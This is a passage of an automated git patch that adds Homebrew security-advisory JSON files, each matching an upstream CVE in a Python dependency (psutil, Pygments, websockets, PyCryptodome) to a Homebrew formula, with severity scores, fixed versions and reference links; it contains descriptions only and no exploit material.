From 44b581bdf6fe6e5d2086f834e62cdec3ea027fc2 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Thu, 13 Aug 2026 17:57:01 +0000 Subject: [PATCH] Matched advisory candidates (shard 27) Base: 780d89a367bfbb28274ad2768cebc8524318b955 --- advisories/BREW-asitop-CVE-2019-18874.json | 121 ++++++++++ advisories/BREW-bittensor-CVE-2015-8557.json | 133 +++++++++++ .../BREW-bittensor-CVE-2018-1000518.json | 93 ++++++++ advisories/BREW-bittensor-CVE-2018-15560.json | 101 ++++++++ advisories/BREW-bittensor-CVE-2021-20270.json | 113 +++++++++ advisories/BREW-bittensor-CVE-2021-27291.json | 125 ++++++++++ advisories/BREW-bittensor-CVE-2021-33880.json | 101 ++++++++ advisories/BREW-bittensor-CVE-2022-1930.json | 89 +++++++ advisories/BREW-bittensor-CVE-2022-40896.json | 121 ++++++++++ advisories/BREW-bittensor-CVE-2023-26302.json | 101 ++++++++ advisories/BREW-bittensor-CVE-2023-26303.json | 101 ++++++++ advisories/BREW-bittensor-CVE-2023-52323.json | 102 ++++++++ advisories/BREW-bittensor-CVE-2026-4539.json | 113 +++++++++ .../BREW-bittensor-GHSA-3qwc-47jf-5rf7.json | 69 ++++++ .../BREW-bittensor-GHSA-rqr8-pxh7-cq3g.json | 71 ++++++ .../BREW-gemini-cli-CVE-2026-12537.json | 69 ++++++ .../BREW-python@3.10-CVE-2013-1629.json | 117 ++++++++++ .../BREW-python@3.10-CVE-2013-1633.json | 93 ++++++++ .../BREW-python@3.10-CVE-2013-1888.json | 121 ++++++++++ .../BREW-python@3.10-CVE-2013-5123.json | 117 ++++++++++ .../BREW-python@3.10-CVE-2014-8991.json | 113 +++++++++ .../BREW-python@3.10-CVE-2019-20916.json | 125 ++++++++++ .../BREW-python@3.10-CVE-2021-3572.json | 125 ++++++++++ .../BREW-python@3.10-CVE-2022-40897.json | 138 +++++++++++ .../BREW-python@3.10-CVE-2022-40898.json | 101 ++++++++ .../BREW-python@3.10-CVE-2023-5752.json | 125 ++++++++++ .../BREW-python@3.10-CVE-2024-6345.json | 102 ++++++++ .../BREW-python@3.10-CVE-2025-47273.json | 106 +++++++++ .../BREW-python@3.10-CVE-2025-8869.json | 101 ++++++++ .../BREW-python@3.10-CVE-2026-1703.json | 93 ++++++++ .../BREW-python@3.10-CVE-2026-24049.json | 97 ++++++++ .../BREW-python@3.10-CVE-2026-3219.json | 97 ++++++++ .../BREW-python@3.10-CVE-2026-59890.json | 98 ++++++++ .../BREW-python@3.10-CVE-2026-6357.json | 97 ++++++++ .../BREW-python@3.10-CVE-2026-8643.json | 221 ++++++++++++++++++ advisories/BREW-sceptre-CVE-2013-1633.json | 93 ++++++++ advisories/BREW-sceptre-CVE-2014-0012.json | 129 ++++++++++ advisories/BREW-sceptre-CVE-2014-1402.json | 133 +++++++++++ advisories/BREW-sceptre-CVE-2014-1829.json | 125 ++++++++++ advisories/BREW-sceptre-CVE-2014-1830.json | 117 ++++++++++ advisories/BREW-sceptre-CVE-2015-2296.json | 115 +++++++++ advisories/BREW-sceptre-CVE-2016-10745.json | 137 +++++++++++ advisories/BREW-sceptre-CVE-2016-9015.json | 101 ++++++++ advisories/BREW-sceptre-CVE-2017-18342.json | 129 ++++++++++ advisories/BREW-sceptre-CVE-2018-18074.json | 125 ++++++++++ advisories/BREW-sceptre-CVE-2018-20060.json | 141 +++++++++++ advisories/BREW-sceptre-CVE-2018-25091.json | 101 ++++++++ advisories/BREW-sceptre-CVE-2019-10906.json | 169 ++++++++++++++ advisories/BREW-sceptre-CVE-2019-11236.json | 153 ++++++++++++ advisories/BREW-sceptre-CVE-2019-11324.json | 145 ++++++++++++ advisories/BREW-sceptre-CVE-2019-20477.json | 109 +++++++++ advisories/BREW-sceptre-CVE-2020-14343.json | 125 ++++++++++ advisories/BREW-sceptre-CVE-2020-1747.json | 145 ++++++++++++ advisories/BREW-sceptre-CVE-2020-26137.json | 121 ++++++++++ advisories/BREW-sceptre-CVE-2020-28493.json | 118 ++++++++++ advisories/BREW-sceptre-CVE-2020-7212.json | 105 +++++++++ advisories/BREW-sceptre-CVE-2021-28363.json | 137 +++++++++++ advisories/BREW-sceptre-CVE-2021-33503.json | 121 ++++++++++ advisories/BREW-sceptre-CVE-2022-40897.json | 138 +++++++++++ advisories/BREW-sceptre-CVE-2023-32681.json | 113 +++++++++ advisories/BREW-sceptre-CVE-2023-43804.json | 129 ++++++++++ advisories/BREW-sceptre-CVE-2023-45803.json | 133 +++++++++++ advisories/BREW-sceptre-CVE-2024-22195.json | 113 +++++++++ advisories/BREW-sceptre-CVE-2024-34064.json | 109 +++++++++ advisories/BREW-sceptre-CVE-2024-35195.json | 101 ++++++++ advisories/BREW-sceptre-CVE-2024-3651.json | 121 ++++++++++ advisories/BREW-sceptre-CVE-2024-37891.json | 105 +++++++++ advisories/BREW-sceptre-CVE-2024-47081.json | 121 ++++++++++ advisories/BREW-sceptre-CVE-2024-56201.json | 101 ++++++++ advisories/BREW-sceptre-CVE-2024-56326.json | 101 ++++++++ advisories/BREW-sceptre-CVE-2024-6345.json | 102 ++++++++ advisories/BREW-sceptre-CVE-2025-27516.json | 97 ++++++++ advisories/BREW-sceptre-CVE-2025-47273.json | 106 +++++++++ advisories/BREW-sceptre-CVE-2025-50181.json | 93 ++++++++ advisories/BREW-sceptre-CVE-2025-50182.json | 93 ++++++++ advisories/BREW-sceptre-CVE-2025-58367.json | 101 ++++++++ advisories/BREW-sceptre-CVE-2025-66418.json | 89 +++++++ advisories/BREW-sceptre-CVE-2025-66471.json | 89 +++++++ advisories/BREW-sceptre-CVE-2026-21441.json | 97 ++++++++ advisories/BREW-sceptre-CVE-2026-25645.json | 93 ++++++++ advisories/BREW-sceptre-CVE-2026-33155.json | 89 +++++++ advisories/BREW-sceptre-CVE-2026-44431.json | 89 +++++++ advisories/BREW-sceptre-CVE-2026-44432.json | 93 ++++++++ advisories/BREW-sceptre-CVE-2026-45409.json | 93 ++++++++ advisories/BREW-sceptre-CVE-2026-59890.json | 98 ++++++++ advisories/BREW-sceptre-CVE-2026-7246.json | 92 ++++++++ 86 files changed, 9603 insertions(+) create mode 100644 advisories/BREW-asitop-CVE-2019-18874.json create mode 100644 advisories/BREW-bittensor-CVE-2015-8557.json create mode 100644 advisories/BREW-bittensor-CVE-2018-1000518.json create mode 100644 advisories/BREW-bittensor-CVE-2018-15560.json create mode 100644 advisories/BREW-bittensor-CVE-2021-20270.json create mode 100644 advisories/BREW-bittensor-CVE-2021-27291.json create mode 100644 advisories/BREW-bittensor-CVE-2021-33880.json create mode 100644 advisories/BREW-bittensor-CVE-2022-1930.json create mode 100644 advisories/BREW-bittensor-CVE-2022-40896.json create mode 100644 advisories/BREW-bittensor-CVE-2023-26302.json create mode 100644 advisories/BREW-bittensor-CVE-2023-26303.json create mode 100644 advisories/BREW-bittensor-CVE-2023-52323.json create mode 100644 advisories/BREW-bittensor-CVE-2026-4539.json create mode 100644 advisories/BREW-bittensor-GHSA-3qwc-47jf-5rf7.json create mode 100644 advisories/BREW-bittensor-GHSA-rqr8-pxh7-cq3g.json create mode 100644 advisories/BREW-gemini-cli-CVE-2026-12537.json create mode 100644 advisories/BREW-python@3.10-CVE-2013-1629.json create mode 100644 advisories/BREW-python@3.10-CVE-2013-1633.json create mode 100644 advisories/BREW-python@3.10-CVE-2013-1888.json create mode 100644 advisories/BREW-python@3.10-CVE-2013-5123.json create mode 100644 advisories/BREW-python@3.10-CVE-2014-8991.json create mode 100644 advisories/BREW-python@3.10-CVE-2019-20916.json create mode 100644 advisories/BREW-python@3.10-CVE-2021-3572.json create mode 100644 advisories/BREW-python@3.10-CVE-2022-40897.json create mode 100644 advisories/BREW-python@3.10-CVE-2022-40898.json create mode 100644 advisories/BREW-python@3.10-CVE-2023-5752.json create mode 100644 advisories/BREW-python@3.10-CVE-2024-6345.json create mode 100644 advisories/BREW-python@3.10-CVE-2025-47273.json create mode 100644 advisories/BREW-python@3.10-CVE-2025-8869.json create mode 100644 advisories/BREW-python@3.10-CVE-2026-1703.json create mode 100644 advisories/BREW-python@3.10-CVE-2026-24049.json create mode 100644 advisories/BREW-python@3.10-CVE-2026-3219.json create mode 100644 advisories/BREW-python@3.10-CVE-2026-59890.json create mode 100644 advisories/BREW-python@3.10-CVE-2026-6357.json create mode 100644 advisories/BREW-python@3.10-CVE-2026-8643.json create mode 100644 advisories/BREW-sceptre-CVE-2013-1633.json create mode 100644 advisories/BREW-sceptre-CVE-2014-0012.json create mode 100644 advisories/BREW-sceptre-CVE-2014-1402.json create mode 100644 advisories/BREW-sceptre-CVE-2014-1829.json create mode 100644 advisories/BREW-sceptre-CVE-2014-1830.json create mode 100644 advisories/BREW-sceptre-CVE-2015-2296.json create mode 100644 advisories/BREW-sceptre-CVE-2016-10745.json create mode 100644 advisories/BREW-sceptre-CVE-2016-9015.json create mode 100644 advisories/BREW-sceptre-CVE-2017-18342.json create mode 100644 advisories/BREW-sceptre-CVE-2018-18074.json create mode 100644 advisories/BREW-sceptre-CVE-2018-20060.json create mode 100644 advisories/BREW-sceptre-CVE-2018-25091.json create mode 100644 advisories/BREW-sceptre-CVE-2019-10906.json create mode 100644 advisories/BREW-sceptre-CVE-2019-11236.json create mode 100644 advisories/BREW-sceptre-CVE-2019-11324.json create mode 100644 advisories/BREW-sceptre-CVE-2019-20477.json create mode 100644 advisories/BREW-sceptre-CVE-2020-14343.json create mode 100644 advisories/BREW-sceptre-CVE-2020-1747.json create mode 100644 advisories/BREW-sceptre-CVE-2020-26137.json create mode 100644 advisories/BREW-sceptre-CVE-2020-28493.json create mode 100644 advisories/BREW-sceptre-CVE-2020-7212.json create mode 100644 advisories/BREW-sceptre-CVE-2021-28363.json create mode 100644 advisories/BREW-sceptre-CVE-2021-33503.json create mode 100644 advisories/BREW-sceptre-CVE-2022-40897.json create mode 100644 advisories/BREW-sceptre-CVE-2023-32681.json create mode 100644 advisories/BREW-sceptre-CVE-2023-43804.json create mode 100644 advisories/BREW-sceptre-CVE-2023-45803.json create mode 100644 advisories/BREW-sceptre-CVE-2024-22195.json create mode 100644 advisories/BREW-sceptre-CVE-2024-34064.json create mode 100644 advisories/BREW-sceptre-CVE-2024-35195.json create mode 100644 advisories/BREW-sceptre-CVE-2024-3651.json create mode 100644 advisories/BREW-sceptre-CVE-2024-37891.json create mode 100644 advisories/BREW-sceptre-CVE-2024-47081.json create mode 100644 advisories/BREW-sceptre-CVE-2024-56201.json create mode 100644 advisories/BREW-sceptre-CVE-2024-56326.json create mode 100644 advisories/BREW-sceptre-CVE-2024-6345.json create mode 100644 advisories/BREW-sceptre-CVE-2025-27516.json create mode 100644 advisories/BREW-sceptre-CVE-2025-47273.json create mode 100644 advisories/BREW-sceptre-CVE-2025-50181.json create mode 100644 advisories/BREW-sceptre-CVE-2025-50182.json create mode 100644 advisories/BREW-sceptre-CVE-2025-58367.json create mode 100644 advisories/BREW-sceptre-CVE-2025-66418.json create mode 100644 advisories/BREW-sceptre-CVE-2025-66471.json create mode 100644 advisories/BREW-sceptre-CVE-2026-21441.json create mode 100644 advisories/BREW-sceptre-CVE-2026-25645.json create mode 100644 advisories/BREW-sceptre-CVE-2026-33155.json create mode 100644 advisories/BREW-sceptre-CVE-2026-44431.json create mode 100644 advisories/BREW-sceptre-CVE-2026-44432.json create mode 100644 advisories/BREW-sceptre-CVE-2026-45409.json create mode 100644 advisories/BREW-sceptre-CVE-2026-59890.json create mode 100644 advisories/BREW-sceptre-CVE-2026-7246.json diff --git a/advisories/BREW-asitop-CVE-2019-18874.json b/advisories/BREW-asitop-CVE-2019-18874.json new file mode 100644 index 00000000000..6f7f3e8c24a --- /dev/null +++ b/advisories/BREW-asitop-CVE-2019-18874.json @@ -0,0 +1,121 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-asitop-CVE-2019-18874", + "published": "2026-08-13T16:36:07Z", + "modified": "2026-08-13T16:36:07Z", + "upstream": [ + "GHSA-qfc5-mcwq-26q8", + "CVE-2019-18874", + "PYSEC-2019-41" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "asitop", + "purl": "pkg:brew/asitop" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.24" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "5.6.6", + "resource": "psutil", + "resource_purl": "pkg:pypi/psutil@7.1.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "psutil", + "subject_version": "7.1.0", + "key": "pkg:pypi/psutil@7.1.0", + "resource": "psutil" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "psutil", + "subject_version": "7.1.0", + "key": "pkg:pypi/psutil@7.1.0", + "resource": "psutil" + } + ] + }, + "summary": "Double Free in psutil", + "details": "psutil (aka python-psutil) through 5.6.5 can have a double free. This occurs because of refcount mishandling within a while or for loop that converts system data into a Python object.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-18874" + }, + { + "type": "WEB", + "url": "https://github.com/giampaolo/psutil/pull/1616" + }, + { + "type": "WEB", + "url": "https://github.com/giampaolo/psutil/commit/7d512c8e4442a896d56505be3e78f1156f443465" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-qfc5-mcwq-26q8" + }, + { + "type": "PACKAGE", + "url": "https://github.com/giampaolo/psutil" + }, + { + "type": "WEB", + "url": "https://github.com/giampaolo/psutil/blob/master/HISTORY.rst#566" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/psutil/PYSEC-2019-41.yaml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00018.html" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2P7QI7MOTZTFXQYU23CP3RAWXCERMOAS" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OLETTJYZL2SMBUI4Q2NGBMGPDPP54SRG" + }, + { + "type": "WEB", + "url": "https://usn.ubuntu.com/4204-1" + } + ] +} diff --git a/advisories/BREW-bittensor-CVE-2015-8557.json b/advisories/BREW-bittensor-CVE-2015-8557.json new file mode 100644 index 00000000000..9a36faa1d69 --- /dev/null +++ b/advisories/BREW-bittensor-CVE-2015-8557.json @@ -0,0 +1,133 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bittensor-CVE-2015-8557", + "published": "2026-08-13T16:38:09Z", + "modified": "2026-08-13T16:38:09Z", + "upstream": [ + "GHSA-fff8-4w9p-7v76", + "CVE-2015-8557", + "PYSEC-2016-32" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bittensor", + "purl": "pkg:brew/bittensor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "11.0.2" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.1", + "resource": "pygments", + "resource_purl": "pkg:pypi/pygments@2.20.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pygments", + "subject_version": "2.20.0", + "key": "pkg:pypi/pygments@2.20.0", + "resource": "pygments" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pygments", + "subject_version": "2.20.0", + "key": "pkg:pypi/pygments@2.20.0", + "resource": "pygments" + } + ] + }, + "summary": "Command Injection in Pygments", + "details": "The FontManager._get_nix_font_path function in formatters/img.py in Pygments 1.2.2 through 2.0.2 allows remote attackers to execute arbitrary commands via shell metacharacters in a font name.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8557" + }, + { + "type": "WEB", + "url": "https://github.com/pygments/pygments/commit/db6dd826f8624179e563aaded391efe824462f51" + }, + { + "type": "WEB", + "url": "https://bitbucket.org/birkenfeld/pygments-main/pull-requests/501/fix-shell-injection-in/diff" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-fff8-4w9p-7v76" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pygments/pygments" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pygments/PYSEC-2016-32.yaml" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/201612-05" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/133823/Pygments-FontManager._get_nix_font_path-Shell-Injection.html" + }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2015/Oct/4" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2016/dsa-3445" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2015/12/14/17" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2015/12/14/6" + }, + { + "type": "WEB", + "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html" + }, + { + "type": "WEB", + "url": "http://www.ubuntu.com/usn/USN-2862-1" + } + ] +} diff --git a/advisories/BREW-bittensor-CVE-2018-1000518.json b/advisories/BREW-bittensor-CVE-2018-1000518.json new file mode 100644 index 00000000000..0d8b3d83031 --- /dev/null +++ b/advisories/BREW-bittensor-CVE-2018-1000518.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bittensor-CVE-2018-1000518", + "published": "2026-08-13T16:38:09Z", + "modified": "2026-08-13T16:38:09Z", + "upstream": [ + "GHSA-6g87-ff9q-v847", + "CVE-2018-1000518", + "PYSEC-2018-79" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bittensor", + "purl": "pkg:brew/bittensor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "11.0.2" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "5.0", + "resource": "websockets", + "resource_purl": "pkg:pypi/websockets@16.1.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "websockets", + "subject_version": "16.1.1", + "key": "pkg:pypi/websockets@16.1.1", + "resource": "websockets" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "websockets", + "subject_version": "16.1.1", + "key": "pkg:pypi/websockets@16.1.1", + "resource": "websockets" + } + ] + }, + "summary": "websockets is vulnerable to denial of service by memory exhaustion", + "details": "The Python websockets library version 4 contains a CWE-409: Improper Handling of Highly Compressed Data (Data Amplification) vulnerability in Servers and clients, unless configured with compression=None that can result in Denial of Service by memory exhaustion. This attack appears to be exploitable via sending a specially crafted frame on an established connection. This vulnerability appears to have been fixed in version 5.0", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000518" + }, + { + "type": "WEB", + "url": "https://github.com/aaugustin/websockets/pull/407" + }, + { + "type": "PACKAGE", + "url": "https://github.com/aaugustin/websockets" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/websockets/PYSEC-2018-79.yaml" + } + ] +} diff --git a/advisories/BREW-bittensor-CVE-2018-15560.json b/advisories/BREW-bittensor-CVE-2018-15560.json new file mode 100644 index 00000000000..801585bcc39 --- /dev/null +++ b/advisories/BREW-bittensor-CVE-2018-15560.json @@ -0,0 +1,101 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bittensor-CVE-2018-15560", + "published": "2026-08-13T16:38:09Z", + "modified": "2026-08-13T16:38:09Z", + "upstream": [ + "GHSA-hgg3-g7gr-66r7", + "CVE-2018-15560", + "PYSEC-2018-21" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bittensor", + "purl": "pkg:brew/bittensor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "11.0.2" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.6.6", + "resource": "pycryptodome", + "resource_purl": "pkg:pypi/pycryptodome@3.23.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pycryptodome", + "subject_version": "3.23.0", + "key": "pkg:pypi/pycryptodome@3.23.0", + "resource": "pycryptodome" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pycryptodome", + "subject_version": "3.23.0", + "key": "pkg:pypi/pycryptodome@3.23.0", + "resource": "pycryptodome" + } + ] + }, + "summary": "PyCryptodome integer overflow vulnerability", + "details": "PyCryptodome before 3.6.6 has an integer overflow in the data_len variable in AESNI.c, related to the AESNI_encrypt and AESNI_decrypt functions, leading to the mishandling of messages shorter than 16 bytes.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-15560" + }, + { + "type": "WEB", + "url": "https://github.com/Legrandin/pycryptodome/issues/198" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Legrandin/pycryptodome" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-hgg3-g7gr-66r7" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pycryptodome/PYSEC-2018-21.yaml" + }, + { + "type": "WEB", + "url": "https://whitehatck01.blogspot.com/2018/08/integer-overflow-vulnerability-in.html" + } + ] +} diff --git a/advisories/BREW-bittensor-CVE-2021-20270.json b/advisories/BREW-bittensor-CVE-2021-20270.json new file mode 100644 index 00000000000..084082e813d --- /dev/null +++ b/advisories/BREW-bittensor-CVE-2021-20270.json @@ -0,0 +1,113 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bittensor-CVE-2021-20270", + "published": "2026-08-13T16:38:09Z", + "modified": "2026-08-13T16:38:09Z", + "upstream": [ + "GHSA-9w8r-397f-prfh", + "CVE-2021-20270", + "PYSEC-2021-140" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bittensor", + "purl": "pkg:brew/bittensor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "11.0.2" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.7.4", + "resource": "pygments", + "resource_purl": "pkg:pypi/pygments@2.20.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pygments", + "subject_version": "2.20.0", + "key": "pkg:pypi/pygments@2.20.0", + "resource": "pygments" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pygments", + "subject_version": "2.20.0", + "key": "pkg:pypi/pygments@2.20.0", + "resource": "pygments" + } + ] + }, + "summary": "Infinite Loop in Pygments", + "details": "An infinite loop in SMLLexer in Pygments versions 1.5 to 2.7.3 may lead to denial of service when performing syntax highlighting of a Standard ML (SML) source file, as demonstrated by input that only contains the \"exception\" keyword.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20270" + }, + { + "type": "WEB", + "url": "https://github.com/pygments/pygments/commit/f91804ff4772e3ab41f46e28d370f57898700333" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1922136" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pygments/pygments" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pygments/PYSEC-2021-140.yaml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2021/05/msg00003.html" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2021/05/msg00006.html" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2021/dsa-4889" + }, + { + "type": "WEB", + "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" + } + ] +} diff --git a/advisories/BREW-bittensor-CVE-2021-27291.json b/advisories/BREW-bittensor-CVE-2021-27291.json new file mode 100644 index 00000000000..0a626f3b05e --- /dev/null +++ b/advisories/BREW-bittensor-CVE-2021-27291.json @@ -0,0 +1,125 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bittensor-CVE-2021-27291", + "published": "2026-08-13T16:38:09Z", + "modified": "2026-08-13T16:38:09Z", + "upstream": [ + "GHSA-pq64-v7f5-gqh8", + "CVE-2021-27291", + "PYSEC-2021-141" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bittensor", + "purl": "pkg:brew/bittensor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "11.0.2" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.7.4", + "resource": "pygments", + "resource_purl": "pkg:pypi/pygments@2.20.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pygments", + "subject_version": "2.20.0", + "key": "pkg:pypi/pygments@2.20.0", + "resource": "pygments" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pygments", + "subject_version": "2.20.0", + "key": "pkg:pypi/pygments@2.20.0", + "resource": "pygments" + } + ] + }, + "summary": "Pygments vulnerable to Regular Expression Denial of Service (ReDoS)", + "details": "In pygments 1.1+, fixed in 2.7.4, the lexers used to parse programming languages rely heavily on regular expressions. Some of the regular expressions have exponential or cubic worst-case complexity and are vulnerable to ReDoS. By crafting malicious input, an attacker can cause a denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27291" + }, + { + "type": "WEB", + "url": "https://github.com/pygments/pygments/commit/2e7e8c4a7b318f4032493773732754e418279a14" + }, + { + "type": "WEB", + "url": "https://gist.github.com/b-c-ds/b1a2cc0c68a35c57188575eb496de5ce" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pygments/pygments" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pygments/PYSEC-2021-141.yaml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00024.html" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2021/05/msg00003.html" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2021/05/msg00006.html" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GSJRFHALQ7E3UV4FFMFU2YQ6LUDHAI55" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WSLD67LFGXOX2K5YNESSWAS4AGZIJTUQ" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2021/dsa-4878" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2021/dsa-4889" + } + ] +} diff --git a/advisories/BREW-bittensor-CVE-2021-33880.json b/advisories/BREW-bittensor-CVE-2021-33880.json new file mode 100644 index 00000000000..094b3343055 --- /dev/null +++ b/advisories/BREW-bittensor-CVE-2021-33880.json @@ -0,0 +1,101 @@ +{ + 